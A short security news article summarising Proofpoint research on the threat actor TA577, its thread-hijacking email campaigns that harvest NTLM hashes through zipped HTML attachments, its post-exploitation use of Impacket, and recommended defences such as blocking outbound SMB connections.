TA577 Expands Cyber Activities Beyond Initial Access

Continued coverage of the threat actor tracked as TA577, Proofpoint researchers have revealed that these initial access brokers (IABs) have broadened their scope into post-exploitation activities. These insights build upon observations from February 26 and 27, 2024, when TA577 launched email campaigns specifically designed to harvest NTLM authentication hashes. Traditionally, IABs would conclude their operation upon acquiring such sensitive data, yet TA577 has escalated their tactics by exploiting Impacket for further malicious activities. "This discovery further confirmed that the malicious intent behind TA577’s activities is to go well beyond the initial account or system compromise," report Proofpoint researchers Laura Hamel and Matthew Gardiner.

In the campaigns conducted on February 26 and 27, TA577 utilized a method known as thread hijacking, sending emails that masqueraded as responses to earlier conversations and contained HTML attachments within zip files. When these attachments were opened, they established a connection to a server controlled by the threat actors, aimed at capturing NTLM hash details. The researchers notes, this technique bypasses conventional signature-based detection through the use of unique identifiers for each attachment. Moreover, it effectively circumvents multifactor authentication (MFA) since "TA577 targeted previously authenticated users on active Windows machines. If targeted businesses used MFA, that authentication step would have already occurred," thus not impeding the attackers.

The expansion in TA577's activities in the attack chain as well as initiating their attack without requiring the use of malware demonstrates the proficiency of this threat group. Compromise to SMB servers would expose a wide range of sensitive information, including usernames, passwords, and session hashes. Proofpoint's findings urge the implementation of security measures, including the blocking and monitoring of outbound SMB connections, to mitigate the risks associated with TA577's latest campaign. In addition, emphasizes the necessity of timely updates for software patching. The attack vector in harvesting NTLM authentication data is also utilized in campaigns orchestrated by Earth Kapre as reported by Trend Micro earlier in March.